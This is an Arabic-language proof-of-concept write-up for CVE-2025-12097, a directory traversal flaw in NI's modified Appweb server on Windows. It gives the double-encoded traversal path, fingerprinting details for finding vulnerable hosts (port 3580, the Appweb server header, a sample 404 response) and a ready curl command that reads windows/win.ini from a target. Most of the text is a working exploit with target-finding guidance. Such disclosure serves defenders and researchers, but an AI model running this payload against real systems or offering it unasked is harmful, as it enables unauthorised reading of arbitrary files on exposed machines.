
إثبات المفهوم لاستغلال CVE-2025-12097، ثغرة اجتياز الدليل في خادم Appweb NI-modified تسمح بقراءة ملفات عشوائية على أنظمة Windows.
يحتوي تعديل NI لخادم Appweb على ثغرة اجتياز دليل تسمح للمهاجم بقراءة ملفات عشوائية على الخادم.
مسار URI /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini سيتم تحويله إلى:
pathInfo cchar * "/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/windows/win.ini” 0x000000010076f808
وهو URI صالح ولا يقوم Appweb بحظر هذا الطلب. ثم يتم تمريره إلى معالج مخصص يعيد في هذه الحالة محتويات أي ملف مطلوب.
نظرًا لطبيعة البرنامج المتأثر، فإن الأجهزة المتأثرة هي حصريًا أنظمة Microsoft Windows.
أعلى نسخة ضعيفة تم رصدها: 12.0.0.
يمكن تحديد الأجهزة المتأثرة من خلال الخصائص التالية:
ليست موجودة دائمًا، لكن في معظم الحالات تعمل الخدمة على المنفذ 3580، وقد تشمل المنافذ الأخرى 8080 و80.
استجابة الخادم إلى /
HTTP/1.1 404 Not Found
Server: Mbedthis-Appweb/2.5.0
Date: Thu, 11 Dec 2025 18:23:26 GMT
Connection: keep-alive
Keep-Alive: timeout=60000, max=100
Content-Type: text/html
Content-length: 126
<HTML><HEAD><TITLE>Document Error: Not Found</TITLE></HEAD>
<BODY><H2>Access Error: 404 -- Not Found</H2>
</BODY></HTML>
لاستغلال هذه الثغرة، يمكنك استخدام الأمر التالي:
curl http://<TARGET>:3580/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini
سترى محتويات ملف win.ini إذا كان الهدف ضعيفًا.